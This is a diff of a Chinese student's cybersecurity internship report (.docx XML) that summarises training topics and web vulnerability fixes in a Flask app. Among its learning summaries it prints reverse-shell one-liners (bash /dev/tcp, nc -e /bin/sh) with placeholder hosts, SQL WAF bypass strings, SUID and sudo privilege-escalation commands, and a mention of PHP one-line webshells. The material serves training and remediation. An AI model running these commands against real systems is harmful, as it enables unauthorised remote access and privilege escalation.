+          </w:p>
+          <w:p/>
+          <w:p>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>在工具使用方面，熟练掌握了安全从业人员必备的核心技能：Kali Linux 作为渗透测试基础平台、Burp Suite 进行 HTTP 流量分析拦截与字典攻击、OpenClaw AI Agent 辅助漏洞分析报告生成、Git 进行版本管理与协同开发。特别是在 Burp Suite 的使用上，完成了从安装配置、代理设置到 Intruder 模块字典攻击的完整实战链路。</w:t>
-            </w:r>
-          </w:p>
+              <w:t>实训最大的收获是安全思维的建立与实践。从 SQL 注入使用参数化查询即可修复，到 SSTI 需要深入理解模板引擎原理才能防御，再到命令注入需要三层防御策略构建纵深防御——每一个漏洞的修复都让我更深刻理解：安全不是某个独立的功能模块，而是贯穿开发全生命周期的持续过程。从攻击者视角理解漏洞利用手段，从防御者视角设计多层次修复方案——这种双向安全思维将伴随我未来的技术成长，是本次实训最重要的收获。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
           <w:p>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                 <w:sz w:val="24"/>
               </w:rPr>
-              <w:t>本次实训的另一重要收获是内网渗透与系统利用能力的建立。通过 NPS 客户端配置掌握了内网穿透隧道建立方法；通过 Linux 常见利用手法学习了 SUID 提权、计划任务利用、sudo 配置错误等系统层面攻击技术；通过 PHP 反弹木马和多种 Shell 反弹手法掌握了远程控制与权限维持的核心技能。这些进阶内容让我对网络安全的理解从 Web 层深入到了系统层和网络层。</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>实训最大的收获是安全思维的建立。从 SQL 注入到命令注入，从越权到 CSRF，每一个漏洞的修复都让我更深刻地理解：安全不是某个独立的功能模块，而是贯穿开发全生命周期的持续过程。从攻击者视角理解漏洞利用，从防御者视角设计修复方案——这种双向思维将伴随我未来的技术成长。</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x13 Shell 反弹手法：掌握了多种反向 Shell 的构造方式：bash 反弹（bash -i &gt;&amp; /dev/tcp/IP/PORT 0&gt;&amp;1）、nc 反弹（nc -e /bin/sh IP PORT）、Python 反弹（socket + subprocess 实现）、PHP 反弹（fsockopen + exec 实现），理解了正向连接与反向连接的不同应用场景及防火墙穿透原理。</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
+              <w:t>感谢实训指导教师陈腾老师的指导以及 AI 辅助工具的支持。本次实训让我从一个对 Web 安全仅有模糊概念的学生，成长为能够独立完成漏洞发现、分析、修复及报告撰写的准安全从业者。</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:bookmarkStart w:id="0" w:name="_GoBack"/>
             <w:bookmarkEnd w:id="0"/>

--- a/网络安全实践-2实习报告-王宇杨.docx
+++ b/网络安全实践-2实习报告-王宇杨.docx
@@ -1307,157 +1307,66 @@
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x01 Kali 操作系统初始化：完成 Kali Linux 2026 的安装与系统初始化配置，包括系统更新、网络配置、中文环境设置、基础工具链（git、curl、wget、python3 等）安装，建立标准化的渗透测试工作环境。了解了 Kali 内置的各类安全工具分类与用途，掌握软件包管理、用户权限管理、服务管理、网络配置等基础运维操作。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x02 AI 系统安装：部署 OpenClaw AI Agent 系统，完成基础配置与插件安装，熟悉 AI Agent 的架构设计和工作原理。通过配置 AI 辅助安全分析的环境，实现了利用大语言模型进行代码审计、漏洞分析、方案设计和报告自动生成的能力。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x03 OpenClaw 安装对接 QQ Bot：完成 OpenClaw AI Agent 与 QQ Bot 通道的对接配置，包括 Bot 的注册申请、权限配置、消息路由设置。实现了通过 QQ 与 AI Agent 实时交互的能力，包括消息接收、命令执行、结果反馈等功能的调试与验证。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x04 密码安全：系统学习了密码安全相关知识。0x01 常见部署系统默认用户密码：梳理路由器、数据库（MySQL、PostgreSQL）、中间件、物联网设备等常见系统默认账号密码，建立安全意识基线。0x02 用户名密码泄露：分析泄露途径（数据库注入、日志泄露、社工学、撞库攻击等）及密码保护策略。0x03 TOP7 CVE-2026-40910 frp 漏洞：分析 frp 内网穿透工具的最新高危漏洞。0x04 Burp Suite 安装：Kali 下 JDK 环境配置、社区版/专业版对比、扩展插件使用。0x05 代理设置：配置代理监听 127.0.0.1:8080、导入 CA 证书实现 HTTPS 解密。0x06 BP 字典攻击：Intruder 模块搭配 Kali wordlists 字典库进行爆破攻击，Payload 设置与结果分析筛选。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x05 文件上传实验：发现路径穿越漏洞（../../etc/shell.php）和 Content-Type 绕过漏洞。修复方案：使用 werkzeug.secure_filename() 处理文件名、新增文件魔数校验读取文件头字节验证真实类型（PNG:89 50 4E 47、JPEG:FF D8、GIF:47 49 46 38）、限制文件大小 2MB、设置上传目录不可执行权限。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x06 越权：发现垂直越权（未登录用户可直接访问需认证页面）和水平越权（修改 user_id 可查看他人信息）。修复方案：新增 login_required 装饰器统一认证管理，在敏感接口校验当前用户仅能操作自己的数据。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x07 WAF 绕过：以 SQLi-LABS 靶场开展 Fuzz 测试，掌握注释符绕过、大小写混淆（UnIoN SeLeCt）、双写绕过（UNUNIONION）、编码绕过（URL/Unicode/Hex）、HTTP 参数污染（HPP）等技巧。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x08 文件包含：/page 路由存在本地文件包含漏洞，可读取 /etc/passwd 等系统文件，结合文件上传可实现 RCE。修复方案：使用 os.path.normpath + os.path.realpath 双重路径校验，确保路径在 pages/ 目录前缀下，同时对内容做 HTML 转义防止 XSS。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x09 CSRF 漏洞：所有 POST 操作（改密、充值、上传等）未携带 CSRF Token，攻击者可通过构造恶意页面诱导用户执行非预期操作。修复方案：Flask-WTF CSRFProtect 中间件全局启用 CSRF 保护，所有表单添加隐藏的 csrf_token 字段。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x10 NPS 客户端配置：掌握 NPS 架构原理（服务端+客户端模式）、服务端部署配置（端口绑定、认证密钥）、客户端连接配置（VKEY 验证）、隧道协议选择（TCP/UDP/HTTP/SOCKS5 各协议适用场景）。通过配置客户端隧道实现外网访问内网服务。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x11 Linux 常见利用手法：SUID 提权（find / -perm -4000 查找利用）、计划任务利用（检查 crontab 插入恶意命令）、sudo 配置错误（sudo -l 查看权限利用不当配置提权）、内核漏洞提权（Dirty Pipe、PwnKit 等）。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x12 PHP 反弹 Shell 木马使用：编写 PHP 一句话木马（eval/assert/preg_replace 型），结合反向 Shell 实现 WebShell 管理。掌握大马与小马的区别、WebShell 管理工具（蚁剑、冰蝎、哥斯拉）配置与流量特征分析。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:firstLine="420"/>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>0x13 Shell 反弹手法：bash 反弹（bash -i &gt;&amp; /dev/tcp/IP/PORT 0&gt;&amp;1）、nc 反弹（nc -e /bin/sh）、Python 反弹（socket+dup2+subprocess）、PHP 反弹（fsockopen+exec）。掌握正向连接与反向连接的应用场景及防火墙穿透原理。</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1487,76 +1396,27 @@
                 <w:bCs/>
                 <w:sz w:val="28"/>
               </w:rPr>
-              <w:t>三、实习总结（可另附报告）</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
                 <w:sz w:val="28"/>
               </w:rPr>
-              <w:t>：</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>通过本次为期九天的网络安全实训，我从 Kali Linux 基础操作到 Web 安全漏洞深度修复，系统性地构建了完整的网络安全知识体系。本次实训内容涵盖从底层系统操作到上层 Web 应用安全的全链路技术栈，包括 0x01 Kali 系统初始化、0x02 AI 系统安装、0x03 OpenClaw+QQBot 对接、0x04 密码安全与暴力破解（含 Burp Suite 安装配置、代理设置、字典攻击、默认密码梳理、密码泄露分析、frp 漏洞分析共六项）、0x05 文件上传漏洞、0x06 越权漏洞、0x07 WAF 绕过、0x08 文件包含漏洞、0x09 CSRF 漏洞、0x10 NPS 内网穿透、0x11 Linux 利用手法、0x12 PHP 反弹木马、0x13 Shell 反弹手法共 20 余个细分知识点，做到了理论与实践的紧密结合。</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>在实训项目的安全加固实践中，我将上述安全知识转化为具体的漏洞修复行动，完成了 Flask 用户管理系统从初始版本到全面安全加固的完整演进。项目覆盖用户注册登录、个人资料管理、头像上传、URL 抓取、搜索、页面管理、Ping 网络诊断等完整功能链，累计修复了 SQL 注入、越权、CSRF、文件上传绕过、文件包含、XSS、SSRF、SSTI 模板注入、命令注入等 9 大类安全漏洞。修复过程严格遵循安全开发规范，每一处修复都经过漏洞原理分析、攻击载荷验证、修复方案设计、代码实现、回归测试的完整闭环，共计完成 20 次 Git 提交，生成 8 份 Word 格式的独立漏洞修复报告存档于 GitHub 仓库。通过这些实操，我深刻体会到一个功能正常的 Web 应用在安全层面可能存在的巨大隐患，也建立了所有用户输入不可信的安全编码思维。</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>在工具使用方面，熟练掌握了安全从业人员必备的核心技能。Kali Linux 作为渗透测试基础平台，使用其内置的各类安全工具完成从信息收集到漏洞利用的完整流程。Burp Suite 的熟练使用是本次实训的重要收获之一，从代理配置安装 CA 证书到 HTTPS 流量解密、从请求拦截修改到 Intruder 模块的字典攻击全流程操作均已掌握。OpenClaw AI Agent 的使用让我体验了 AI 辅助安全工作的新范式，大幅提升了工作效率。Git 版本管理则让我养成了规范的代码管理习惯。</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>本次实训的另一重要收获是内网渗透与系统利用能力的建立。通过 NPS 客户端配置掌握了内网穿透隧道建立方法，理解正向代理与反向代理的区别及不同隧道协议适用场景。通过 Linux 常见利用手法学习了 SUID 提权、计划任务利用、sudo 配置错误利用、内核漏洞提权等系统层面攻击技术。通过 PHP 反弹木马和多种 Shell 反弹手法掌握了远程控制与权限维持的核心技能，对网络安全的认知从 Web 应用层面拓展到系统层和网络层。</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>实训最大的收获是安全思维的建立与实践。从 SQL 注入使用参数化查询即可修复，到 SSTI 需要深入理解模板引擎原理才能防御，再到命令注入需要三层防御策略构建纵深防御——每一个漏洞的修复都让我更深刻理解：安全不是某个独立的功能模块，而是贯穿开发全生命周期的持续过程。从攻击者视角理解漏洞利用手段，从防御者视角设计多层次修复方案——这种双向安全思维将伴随我未来的技术成长，是本次实训最重要的收获。</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
-                <w:sz w:val="24"/>
-              </w:rPr>
-              <w:t>感谢实训指导教师陈腾老师的指导以及 AI 辅助工具的支持。本次实训让我从一个对 Web 安全仅有模糊概念的学生，成长为能够独立完成漏洞发现、分析、修复及报告撰写的准安全从业者。</w:t>
-            </w:r>
-          </w:p>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
           <w:p>
             <w:bookmarkStart w:id="0" w:name="_GoBack"/>
             <w:bookmarkEnd w:id="0"/>
@@ -1603,7 +1463,6 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>实习成绩评定：</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1614,7 +1473,6 @@
                 <w:szCs w:val="28"/>
                 <w:u w:val="single"/>
               </w:rPr>
-              <w:t>　　　　　</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1624,7 +1482,6 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>　　　　　</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1667,6 +1524,198 @@
                 <w:sz w:val="24"/>
               </w:rPr>
             </w:pPr>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x01 Kali 操作系统初始化：完成 Kali Linux 2026 的安装与系统初始化配置，包括系统更新、网络配置、中文环境设置、基础工具链（git、curl、wget、python3 等）安装，建立标准化的渗透测试工作环境。了解了 Kali 内置的各类安全工具分类与用途，掌握了软件包管理、用户权限管理、服务管理、网络配置等基础运维操作，为后续实训环节奠定了坚实的系统基础。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x02 AI 系统安装：部署 OpenClaw AI Agent 系统，完成基础配置与插件安装，熟悉了 AI Agent 的架构设计和工作原理。通过配置 AI 辅助安全分析的环境，实现了利用大语言模型进行代码审计、漏洞分析、方案设计和报告自动生成的能力。掌握了 AI Agent 的工具调度机制、技能安装与管理、会话管理等核心功能。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x03 OpenClaw 安装对接 QQ Bot：完成 OpenClaw AI Agent 与 QQ Bot 通道的对接配置，包括 Bot 的注册申请、权限配置、消息路由设置。实现了通过 QQ 与 AI Agent 实时交互的能力，包括消息接收、命令执行、结果反馈等功能的调试与验证。通过 QQ 通道实现远程操作的能力显著提升了实训效率。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x04 密码安全：系统学习了密码安全相关知识。0x01 常见部署系统默认用户密码：梳理了路由器（admin/admin）、数据库（MySQL root/空密码、PostgreSQL postgres/postgres）、中间件（Tomcat、Nginx）、物联网设备等常见系统的默认账号密码，建立安全意识基线。0x02 用户名密码泄露：分析了密码泄露的常见途径，包括数据库注入、日志文件泄露、社会工程学、撞库攻击、暗网数据买卖等，学习了密码保护策略（密码复杂度要求、定期更换、多因素认证、密码管理器使用）。0x03 TOP7 CVE-2026-40910 frp 漏洞：分析 frp 内网穿透工具的最新高危漏洞及利用方式。0x04 Burp Suite 安装：Kali 下完成完整安装配置（JDK 环境、社区版/专业版对比、BApp Store 插件）。0x05 代理设置：配置监听 127.0.0.1:8080，导入 CA 证书实现 HTTPS 流量解密。0x06 BP 字典攻击：Intruder 模块搭配 Kali wordlists 字典库进行爆破攻击，Payload 设置与结果分析筛选。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x05 文件上传实验：发现存在路径穿越漏洞（通过 ../../ 上传到任意目录）和 Content-Type 绕过漏洞两类严重安全问题。修复方案：使用 werkzeug.secure_filename() 处理文件名、新增文件魔数（Magic Number）校验读取文件头部字节验证真实文件类型（如 PNG 的 89 50 4E 47、JPEG 的 FF D8、GIF 的 47 49 46 38）、限制上传文件大小 2MB、设置上传目录不可执行权限。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x06 越权：发现垂直越权（未登录用户可直接访问需认证页面）和水平越权（修改 user_id 参数可查看他人信息）两类漏洞。修复方案：新增 login_required 装饰器统一认证管理，覆盖所有需登录的路由；在敏感接口校验当前用户仅能操作自己的数据。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x07 WAF 绕过：以 SQLi-LABS 靶场开展 Fuzz 测试，掌握了注释符绕过（/**/）、大小写混淆（UnIoN SeLeCt）、双写绕过（UNUNIONION）、编码绕过（URL/Unicode/Hex）、HTTP 参数污染（HPP）等多种绕过技巧。通过 Fuzz 测试深入理解了 WAF 检测规则的工作原理与绕过思路。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x08 文件包含：/page 路由存在本地文件包含漏洞，可读取 /etc/passwd 等系统文件，结合文件上传可实现远程代码执行。修复方案：使用 os.path.normpath + os.path.realpath 双重路径校验，确保路径在 pages/ 目录前缀下；同时对内容做 HTML 转义防止 XSS。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x09 CSRF 漏洞：所有需认证的 POST 操作（改密、充值、上传等）均未携带 CSRF Token，攻击者可构造恶意页面诱导用户执行非预期操作。修复方案：使用 Flask-WTF CSRFProtect 中间件全局启用 CSRF 保护，所有表单添加隐藏的 csrf_token 字段。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x10 NPS 客户端配置：掌握了 NPS（内网穿透工具）的客户端配置方法。包括 NPS 架构原理（服务端+客户端模式）、端口绑定、认证密钥设置、客户端 VKEY 验证、隧道协议选择（TCP/UDP/HTTP/SOCKS5 各协议适用场景）、多隧道管理、状态监控等。通过配置 NPS 隧道实现了外网访问内网服务的穿透能力。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x11 Linux 常见利用手法：学习了系统层面的渗透测试技术。SUID 提权（find / -perm -4000 查找利用）、计划任务利用（检查 crontab 插入恶意命令）、sudo 配置错误（sudo -l 查看权限利用不当配置提权）、内核漏洞提权（Dirty Pipe、PwnKit 等常见漏洞）。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x12 PHP 反弹 Shell 木马使用：编写了 PHP 一句话木马（eval/assert/preg_replace 型），结合反向 Shell 实现 WebShell 管理。掌握了大马与小马的区别、WebShell 管理工具（蚁剑、冰蝎、哥斯拉）的配置与流量特征分析。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>0x13 Shell 反弹手法：掌握了多种反向 Shell 的构造方式：bash 反弹（bash -i &gt;&amp; /dev/tcp/IP/PORT 0&gt;&amp;1）、nc 反弹（nc -e /bin/sh）、Python 反弹（socket+dup2+subprocess 三步法）、PHP 反弹（fsockopen+exec）。学习了正向连接与反向连接的应用场景及防火墙穿透原理。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>通过本次为期九天的网络安全实训，我从 Kali Linux 基础操作到 Web 安全漏洞深度修复，系统性地构建了完整的网络安全知识体系。本次实训内容涵盖从底层系统操作到上层 Web 应用安全的全链路技术栈，包括 0x01 Kali 系统初始化、0x02 AI 系统安装、0x03 OpenClaw+QQBot 对接、0x04 密码安全与暴力破解（含 Burp Suite 安装配置、代理设置、字典攻击、默认密码梳理、密码泄露分析、frp 漏洞分析共六项）、0x05 文件上传漏洞（含路径穿越和 Content-Type 绕过）、0x06 越权漏洞（含垂直越权和水平越权）、0x07 WAF 绕过（含注释符/大小写/双写/编码/HPP 等多种绕过技术）、0x08 文件包含漏洞（含路径穿越和与 XSS 的组合防御）、0x09 CSRF 漏洞（含 Token 机制的原理与实践）、0x10 NPS 内网穿透（含隧道配置与多协议选择）、0x11 Linux 利用手法（含 SUID 提权、计划任务、sudo 配置错误、内核漏洞）、0x12 PHP 反弹木马（含一句话木马变体和 WebShell 管理工具）、0x13 Shell 反弹手法（含 bash/nc/Python/PHP 多种实现方式）共 20 余个细分知识点，做到了理论与实践的紧密结合。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>在实训项目的安全加固实践中，我将上述安全知识转化为具体的漏洞修复行动，完成了 Flask 用户管理系统从初始版本到全面安全加固的完整演进。项目覆盖用户注册登录、个人资料管理、头像上传、URL 抓取、搜索、页面管理、Ping 网络诊断等完整功能链，累计修复了 SQL 注入、越权、CSRF、文件上传绕过、文件包含、XSS、SSRF、SSTI 模板注入、命令注入等 9 大类安全漏洞。修复过程严格遵循安全开发规范，每一处修复都经过漏洞原理分析、攻击载荷验证、修复方案设计、代码实现、回归测试的完整闭环，共计完成 20 次 Git 提交，生成 8 份 Word 格式的独立漏洞修复报告存档于 GitHub 仓库。通过这些实操，我深刻体会到一个功能正常的 Web 应用在安全层面可能存在的巨大隐患，也建立了【所有用户输入不可信】的安全编码思维。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>在工具使用方面，熟练掌握了安全从业人员必备的核心技能。Kali Linux 作为渗透测试基础平台，其内置的各类安全工具覆盖了从信息收集到漏洞利用的完整流程。Burp Suite 的熟练使用是本次实训的重要收获之一，从代理配置、安装 CA 证书到 HTTPS 流量解密，从请求拦截修改到 Intruder 模块的字典攻击全流程操作均已掌握。通过 Intruder 的四种攻击模式（Sniper、Battering Ram、Pitchfork、Cluster Bomb）的对比实践，深入理解了不同场景下的最优攻击策略选择。OpenClaw AI Agent 的使用让我体验了 AI 辅助安全工作的新范式，Git 版本管理则让我养成了规范的代码管理习惯。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>本次实训的另一重要收获是内网渗透与系统利用能力的建立。通过 NPS 客户端配置掌握了内网穿透隧道建立方法，理解了正向代理与反向代理的区别及不同隧道协议（TCP/UDP/HTTP/SOCKS5）的适用场景。通过 Linux 常见利用手法学习了 SUID 提权、计划任务利用、sudo 配置错误利用、内核漏洞提权等系统层面攻击技术，建立了 Linux 系统安全加固的全面认识。通过 PHP 反弹木马和多种 Shell 反弹手法掌握了远程控制与权限维持的核心技能。这些进阶内容让我对网络安全的认知从单一的 Web 应用层面拓展到了系统层和网络层，形成了更为立体的安全知识架构。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
+              <w:t>实训最大的收获是安全思维的建立与实践。从 SQL 注入使用参数化查询即可修复，到 SSTI 需要深入理解模板引擎原理才能防御，再到命令注入需要三层防御策略构建纵深防御——每一个漏洞的修复都让我更深刻理解：安全不是某个独立的功能模块，而是贯穿开发全生命周期的持续过程。安全设计需要在需求阶段就开始考虑，安全编码需要融入每一行代码，安全测试需要覆盖所有输入输出路径。从攻击者视角理解漏洞利用手段，从防御者视角设计多层次修复方案——这种双向安全思维将伴随我未来的技术成长，是本次实训最重要的收获。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
+                <w:sz w:val="24"/>
+              </w:rPr>
